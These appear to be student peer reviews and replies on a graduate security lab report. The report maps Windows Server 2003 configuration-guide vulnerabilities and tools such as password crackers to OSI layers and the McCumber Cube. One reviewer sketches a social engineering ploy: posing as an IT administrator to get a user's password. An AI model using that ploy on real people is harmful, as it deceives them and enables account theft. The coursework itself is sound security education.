I think that group 5’s write-up for lab 5 was adequate. The abstract for this lab was good and provided a good overview of the lab. The literary review was very good, in terms of summarizing the readings. Group 5 chose to write the literature review as one big comprehensive review, which is good; however absolutely none of the required questions were answered. It seemed as if the literary review was nothing more than a summary of the required readings and did not include whether the group agreed or disagreed with the readings, any speculation about the research methodology or any errors or omissions, though they did they indicate how it relates to the laboratory. All of the citing for the literary review was done well and all of the pages were included. For this lab, the group answered all of the required questions and provided a good amount of detail about the security configuration guide for Windows Server 2003 that they used. The group also included a very extensive table that indicates many vulnerabilities found in the document and how they relate to the McCumber Cube. For the tools section, there were very few. Many more tools could be applied or at least considered to be possible for some use. Although, the group did test their hypothesis of exploits, they included SMB4K as a tool used to exploit the system (included in the exploit tool section under layer 5). This tool is only a graphical SMB browser and does not perform any exploits. The group also included tcptraceroute as a Denial of Service tool when it only performs enumeration and firewall evasion. The conclusion was well written and accurately summarizes what was covered. Overall, most of the required questions were answered and answered well, however there seemed to be a little confusion about exploits and the functions of certain tools.
The team starts out with a strong abstract and they talk about the availability of white papers for security configurations and how they are available for download at many vendors’ websites, such as the national institute of standards and technologies (NIST). This team is going to be reviewing the security configuration guide for Windows Server 2003 from Microsoft. This document is spilt into three different categories unlike Team 4 document which only had two. The three different levels are legacy client, enterprise client, and specialized security/limited functionality (SSLF). The team nicely laid out the different exploits and gave an explanation to the exploit. In the table is where the team identified the where the vulnerability fit in the McCumber Corrdinates. Like most other groups, they have identified the majority of the tools being in layer 7. In the second table the first Vulnerability is Guess/ discover old password using the exploit tool Lopthcrack, John the Ripper and according to the chart is a layer 8 exploit. My question is how is this software at the people layer? Perhaps talking to this person and getting them to reveal there password to you would be a layer 8 exploit. Walking into there place of work and impersonate an IT administrator, informing that user that you have been sent there to audit them exclusively. This perhaps would cause them to freak out and would cause them to answer any question that you have such as there username and password. This would be complete layer 8 exploit, no need for software just a suite and ID. Some systems only allow for users to guess up to three time before they are locked out of there account. Using tools that will guess the password would have to guess correctly in the first three ties or the user would be locked out. A popular exploit, among all groups seems to be the Denial of Service attack. This group has the denial of service exploit in layer 4, while Team 3 has it in layer 7, which OSI layer would fit the best?
Team five for lab five presents an abstract that, aside from the grammatical errors, gives a good overview of the process team five will follow to complete their lab. However this abstract does not meet the requirements of the syllabus as it is only one paragraph. The syllabus states that any abstract less than two paragraphs will be judged as poor scholarship. The literature review presented by team five has a good level of cohesion among the articles. While I feel there could have been more cohesion they did a decent job. The literature review seems to break the articles into their respective subcategories and the articles in each subcategory reviewed against each other, not as a whole. Team five does, based on previous labs, strive for a very cohesive literature review, and as such they do not really need to improve in this area. The methods that team five used do not show a strategy for completion or an overall technique that was used but rather just the steps to be completed. While this serves to show the other teams what team five did, it makes it almost impossible for other to reproduce the results team five generated. This does not make for an academic or scholarly methods section. In the findings presented by team five, they explain what their tables are, what they are used for, and how they generated them. They then go on to list the possible vulnerabilities of their table in a list broken down by OSI layer. I agree with their layer eight, seven, five, four, three, and one lists. I disagree with their layer six, and two lists. I do not believe that password cracking and privilege escalation happen at layer six, nor do I believe that system volumes and system drivers exist at layer two. These same problems are replicated in table from in their tables section. I also do not see the value in creating a list of the recommendations that their document provided as well as a table. The list works to generate some discussion through explanation, but the table lists the recommendations in a succinct form. As graduate students and information technology or information security professionals, the information provided in the table should be more than enough to generate an attack based on such information. I agree with the conclusions drawn by team five, not just in that they could be based on the methods they provided, but in ideas as well. Lab five was a definite eye opener, and it is very true that if everyone followed the same guides to securing their systems, everyone would be vulnerable to same attacks should someone like a graduate of this course or program has done here. Team five, as team four, also did not give any mention to the approval process for their chosen document in their methods section. Because team one, two, and three did, I find that to be questionable. All in all the lab report generated by team five, while lacking in some areas, was very well written and discussed in others.
@anyone disagreeing with the “guess/discover old password” tools in layer 8- Agreed. JtR wouldn’t work well against someones brain. Social engineering would be a better tool to use here.
@mborton – Your criticism of the conclusion is valid. I think statement would’ve been better stated “The literature review showed us how reverse engineering a system could lead to quicker identification of vulnerabilities. Security configuration guides , by promoting a one-sided way of approaching the security of a system, allow us to quickly identify vulnerabilities that will likely be present in a target’s system.”
@mvanbode – we’ve talked about the OS/security cycle before in previous labs and maybe that could’ve been referenced. security is a journey….not a destination.
@gdekkerj – we felt the double listing allowed us to synthesize the information in tabular format to show the context within the OSI and McCumber cubes. The list allowed us to discuss the vulnerability in depth without making the table too large and cluttered. On that note, I did like how your group gave each vulnerability a unique ID in your table that was referenced later for the description.
@dkender – good catch with the “vulnerabilities that don’t exist.” We were discussing “known” and “unknown” vulnerabilities, very poor word choice there. It would’ve been better stated “vulnerabilities that we don’t know exist.”
@nbakker – Our reasoning for placing device drivers at layer two was that it’s where the operating system interfaces with the hardware. Sun Microsystems agrees (http://docs.sun.com/app/docs/doc/805-4041/6j3r8iu2e?a=view). As to the criticism of not including the document approval process, we felt it had little impact on the outcome of the lab. Anyone recreating the lab exercises would likely not need to get approval of the document they chose to evaluate.